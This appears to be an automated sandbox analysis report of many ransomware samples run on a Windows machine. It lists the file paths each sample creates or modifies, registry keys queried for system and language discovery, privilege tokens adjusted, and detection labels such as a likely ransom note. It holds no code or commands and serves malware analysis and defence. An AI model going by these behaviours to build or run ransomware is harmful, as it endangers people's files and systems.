File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\LargeTile.scale-125.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\mscorlib.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\dynalink.md C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libuleaddvaudio_plugin.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\1px.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-black_targetsize-64.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_2019.807.41.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrusash.dat.exe C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\it-IT\TipRes.dll.mui C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcR_OEM_Perp-ul-oob.xrm-ms.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\Timer3Sec.targetsize-20.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-96_altform-unplated.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\security\public_suffix_list.dat C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_MAKC2R-ul-phn.xrm-ms C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-96_altform-unplated.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\MSFT_PackageManagement.psm1.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-file-l1-2-0.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_it.properties C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-math-l1-1-0.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Trial-pl.xrm-ms C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-180.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosWideTile.contrast-white_scale-125.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\Timer10Sec.targetsize-64.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_altform-unplated_contrast-white.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-32.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SplashScreen.scale-100.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Serialization.Json.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Security.AccessControl.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Internet Explorer\fr-FR\iexplore.exe.mui.exe C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\j2pkcs11.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-140.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\WideTile.scale-125.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe\Microsoft.Advertising.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36_altform-lightunplated.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jopt-simple.md.exe C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\nslookup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\zbhnd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\ChickiMiki Design.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Cntrlphse.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe N/A
